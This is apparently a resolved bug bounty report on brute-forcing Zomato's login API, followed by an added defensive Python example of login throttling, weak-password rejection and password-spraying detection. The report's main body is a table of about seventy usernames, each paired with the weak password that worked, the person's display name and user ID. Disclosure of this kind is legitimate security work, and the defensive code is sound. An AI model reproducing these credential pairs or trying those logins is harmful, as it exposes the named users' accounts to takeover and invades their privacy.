
takeover a lot of accounts

High
Zomato

Team Summary

Official summary from Zomato

A brute-force attack on the login API call led to some accounts being broken into. Fixed now.

Reported by yipman

Vulnerability Details

Technical details and impact analysis

Weak passwords may lead to breaking into many accounts. I have been able to penetrate more than 100 accounts now. ██████ These are some of the accounts: ███

Username | Password | Timeout | Length | Response
maryanne | 123456 | false | 2241 | "status":"true","name":"Mary Anne Gonzales","isNew":false,"user_id":32173616
dermot | 123456 | false | 2235 | "status":"true","name":"Dermot Halpin","isNew":false,"user_id":7454691
cecelia | 123456 | false | 2234 | "status":"true","name":"Nikhil Jain","isNew":false,"user_id":35506188
mel | 123456 | false | 2234 | "status":"true","name":"Melbournian","isNew":false,"user_id":23666776
ade | 123456 | false | 2233 | "status":"true","name":"Ade Ramone","isNew":false,"user_id":21373603
joanne | 123456 | false | 2233 | "status":"true","name":"Whatisthis","isNew":false,"user_id":23405975
cristiano | 123456 | false | 2232 | "status":"true","name":"Cristiano","isNew":false,"user_id":36173575
ken | 123456 | false | 2207 | "status":"true","name":"Kentv34","isNew":false,"user_id":10913421
larissa | 123456 | false | 2207 | "status":"true","name":"Larissa","isNew":false,"user_id":23994281
alfred | 123456 | false | 2206 | "status":"true","name":"Alfred","isNew":false,"user_id":22842777
jordon | 123456 | false | 2206 | "status":"true","name":"Jordon","isNew":false,"user_id":23655216
maris | 123456 | false | 2206 | "status":"true","name":"Ozwaee","isNew":false,"user_id":10927081
rowena | 123456 | false | 2206 | "status":"true","name":"Rowena","isNew":false,"user_id":33832164
jan | 123456 | false | 2205 | "status":"true","name":"Nkfgk","isNew":false,"user_id":11762071
lucas | 123456 | false | 2205 | "status":"true","name":"Lucas","isNew":false,"user_id":24011188
maria | 123456 | false | 2205 | "status":"true","name":"Maria","isNew":false,"user_id":10890321
price | 123456 | false | 2205 | "status":"true","name":"Price","isNew":false,"user_id":12126991
ricky | 123456 | false | 2205 | "status":"true","name":"Ricky","isNew":false,"user_id":25249282
stefan | 123456 | false | 2205 | "status":"true","name":"Fabio","isNew":false,"user_id":29101376
brad | 123456 | false | 2204 | "status":"true","name":"Brad","isNew":false,"user_id":22917465
juan | 123456 | false | 2204 | "status":"true","name":"Juan","isNew":false,"user_id":25608209
bunny | 123456 | false | 2203 | "status":"true","name":"Bunny","isNew":false,"user_id":334327
dolly | 123456 | false | 2203 | "status":"true","name":"Dolly","isNew":false,"user_id":341259
lia | 123456 | false | 2203 | "status":"true","name":"Lia","isNew":false,"user_id":25082436
niki | 123456 | false | 2202 | "status":"true","name":"Niki","isNew":false,"user_id":341296
katherine | 12345 | | | "status":"true","name":"Burgers Plus Green Mountain","isNew":false,"user_id":23478827
had | qwerty | | | "status":"true","name":"M'lbFoodCritic","isNew":false,"user_id":24219454
kristine | qwerty | | | "status":"true","name":"Kristine Dela Cruz","isNew":false,"user_id":36549534
chelsea | 12345 | | | "status":"true","name":"Chelsea Ronald","isNew":false,"user_id":33920791
kaleb | 12345 | | | "status":"true","name":"Kaleb Lawrence","isNew":false,"user_id":33920508
april | 12345 | | | "status":"true","name":"April Hensley","isNew":false,"user_id":21251960
nana | 12345678 | | | "status":"true","name":"Sohal Patel","isNew":false,"user_id":22249776
amelia | 12345 | | | "status":"true","name":"Amelia Diaz","isNew":false,"user_id":34195947
hale | 12345 | | | "status":"true","name":"Hale Cansoy","isNew":false,"user_id":18833440
jill | 12345 | | | "status":"true","name":"Jillandjack","isNew":false,"user_id":33879337
joey | qwerty | | | "status":"true","name":"Joe Niater","isNew":false,"user_id":22997389
prince | 123456789 | | | "status":"true","name":"Prince Kumar","isNew":false,"user_id":591208
bill | 12345 | | | "status":"true","name":"Bill Thomp","isNew":false,"user_id":22737478
den | 12345 | | | "status":"true","name":"Ugur Sss","isNew":false,"user_id":19430947
laurence | 12345 | | | "status":"true","name":"Laurence","isNew":false,"user_id":33493224
lorraine | 12345 | | | "status":"true","name":"Lorraine","isNew":false,"user_id":33891274
charlie | 12345 | | | "status":"true","name":"Charlie","isNew":false,"user_id":22617986
douglass | 12345 | | | "status":"true","name":"Douglas","isNew":false,"user_id":33533934
johnny | 12345 | | | "status":"true","name":"John Alai","isNew":false,"user_id":732722
monty | 12345678 | | | "status":"true","name":"Monty","isNew":false,"user_id":21669794
simon | 12345678 | | | "status":"true","name":"Simon","isNew":false,"user_id":5161521
vinson | qwerty | | | "status":"true","name":"Vinson","isNew":false,"user_id":28146375
carl | 123456789 | | | "status":"true","name":"Carlos","isNew":false,"user_id":11993621
alicia | 12345 | | | "status":"true","name":"Alicia","isNew":false,"user_id":22914207
chrisy | 12345 | | | "status":"true","name":"Chrisy","isNew":false,"user_id":24264674
Any | 12345678 | | | "status":"true","name":"Any","isNew":false,"user_id":32140552
any | 12345678 | | | "status":"true","name":"Any","isNew":false,"user_id":32140552
clint | 12345 | | | "status":"true","name":"Clint","isNew":false,"user_id":20563177
dante | 12345 | | | "status":"true","name":"Dante","isNew":false,"user_id":35031010
linda | 12345 | | | "status":"true","name":"Linda","isNew":false,"user_id":22400357
sa | 12345678 | | | "status":"true","name":"Sat","isNew":false,"user_id":4670091
west | 12345678 | | | "status":"true","name":"West","isNew":false,"user_id":22873679
husain | qwerty | | | "status":"true","name":"Free","isNew":false,"user_id":31480997
isis | qwerty | | | "status":"true","name":"Isis","isNew":false,"user_id":25107230
george | 123456789 | | | "status":"true","name":"George","isNew":false,"user_id":302853
hope | 123456789 | | | "status":"true","name":"Hope","isNew":false,"user_id":23411815
alia | 12345 | | | "status":"true","name":"Alia","isNew":false,"user_id":28162730
joel | 12345 | | | "status":"true","name":"Joel","isNew":false,"user_id":25139013
stanly | qwerty | | | "status":"true","name":"Ram","isNew":false,"user_id":36393602
katya | 12345 | | | "status":"true","name":"Katya","isNew":false,"user_id":146048
WP | 12345 | | | "status":"true","name":"Wp","isNew":false,"user_id":815499
stefano | 1234567 | | | "status":"true","name":"Stefano","isNew":false,"user_id":20644506
keane | 1234567 | | | "status":"true","name":"Keane","isNew":false,"user_id":21242717
DEMO | 12345678 | | | "status":"false","name":"","isNew":"false","message":"The verification process for this email is yet
demo | 12345678 | | | "status":"false","name":"","isNew":"false","message":"The verification process for this email is yet
alex | qwerty | | | "status":"false","name":"","isNew":"false","message":"The verification process for this email is yet
nani | 123456789 | | | "status":"false","name":"","isNew":"false","message":"The verification process for this email is yet
james | 12345 | | | "status":"false","name":"","isNew":"false","message":"The verification process for this email is yet
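The report shows one source sending one guess per account at a login API that never pushed back, with the same handful of trivial passwords succeeding again and again. As an added defender-side illustration (not code from the report or from Zomato), the Python below shows the three controls that close that gap: a sliding-window throttle on the login endpoint keyed on both source IP and target account, a denylist check that rejects the passwords that appear in the table above at registration time, and a scan over auth log lines that flags a single source trying many distinct accounts within a short window, the signature of password spraying. Every log line, IP address, account name and threshold in it is constructed for the example.

```python
"""Login-endpoint throttle, weak-password rejection and spraying detection.

Added example for the report above; not Zomato's code. Every log line, IP
address, account name and threshold here is constructed for illustration.
"""
from collections import defaultdict, deque

WINDOW_SECONDS = 60            # sliding window used by the limiter and the detector
MAX_PER_IP = 10                # login attempts per source IP per window (assumed value)
MAX_PER_ACCOUNT = 5            # login attempts per account per window (assumed value)
SPRAY_DISTINCT_ACCOUNTS = 8    # distinct accounts from one IP per window => spraying (assumed)

# The passwords that succeeded in the report. A real deployment checks a large
# breached-password list; this short set is only for the example.
WEAK_PASSWORDS = {"123456", "12345", "qwerty", "12345678", "123456789", "1234567"}
MIN_PASSWORD_LENGTH = 12


def is_acceptable_password(password):
    """Reject passwords that are too short or on the denylist at registration
    and password-change time, so spraying the common ones finds nothing."""
    return len(password) >= MIN_PASSWORD_LENGTH and password.lower() not in WEAK_PASSWORDS


class LoginThrottle:
    """Sliding-window limiter keyed on source IP *and* on target account.

    A per-account limit alone does not stop spraying (one password, one
    attempt per account); a per-IP limit alone does not stop a distributed
    attack on one account. The login handler calls allow() before it checks
    the password and answers HTTP 429 when it returns False.
    """

    def __init__(self):
        self._by_ip = defaultdict(deque)
        self._by_account = defaultdict(deque)

    @staticmethod
    def _prune(queue, now):
        # Drop timestamps that have fallen out of the window.
        while queue and now - queue[0] >= WINDOW_SECONDS:
            queue.popleft()

    def allow(self, ip, account, now):
        ip_q = self._by_ip[ip]
        acct_q = self._by_account[account.lower()]
        self._prune(ip_q, now)
        self._prune(acct_q, now)
        if len(ip_q) >= MAX_PER_IP or len(acct_q) >= MAX_PER_ACCOUNT:
            return False
        ip_q.append(now)
        acct_q.append(now)
        return True


def parse_auth_line(line):
    """Parse one constructed auth log line: '<unix_ts> <ip> <account> <ok|fail>'."""
    ts, ip, account, result = line.split()
    return int(ts), ip, account.lower(), result == "ok"


def detect_spraying(lines):
    """Return {ip: accounts} for every IP that tried SPRAY_DISTINCT_ACCOUNTS or
    more distinct accounts inside one WINDOW_SECONDS window."""
    per_ip = defaultdict(list)
    for ts, ip, account, _ok in sorted(parse_auth_line(l) for l in lines):
        per_ip[ip].append((ts, account))
    flagged = {}
    for ip, attempts in per_ip.items():
        window = deque()
        for ts, account in attempts:
            window.append((ts, account))
            while ts - window[0][0] >= WINDOW_SECONDS:
                window.popleft()
            accounts = {a for _, a in window}
            if len(accounts) >= SPRAY_DISTINCT_ACCOUNTS:
                flagged[ip] = accounts
    return flagged


# Constructed log: one source tries twelve accounts in twelve seconds (two of
# them succeed), while a legitimate user mistypes twice and then logs in.
SAMPLE_LOG = [
    f"{100 + i} 203.0.113.7 user{i} {'ok' if i in (3, 5) else 'fail'}" for i in range(12)
] + [
    "100 198.51.100.4 alice fail",
    "105 198.51.100.4 alice fail",
    "111 198.51.100.4 alice ok",
]


if __name__ == "__main__":
    throttle = LoginThrottle()
    verdicts = [throttle.allow("203.0.113.7", f"user{i}", 100 + i) for i in range(12)]
    print("attempts admitted before 429:", verdicts.count(True))        # 10
    print("weak password accepted:", is_acceptable_password("123456"))   # False
    for ip, accounts in detect_spraying(SAMPLE_LOG).items():
        print(f"spraying from {ip}: {len(accounts)} accounts in one window")
```

The detector deliberately does not look at passwords, since a well-run service never logs them; counting distinct accounts per source is enough to separate the spraying source from the user who mistypes twice, and the same signal can be forwarded to a SIEM as an alert.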

Report Details

Additional information and metadata

State

Closed

Substate

Resolved
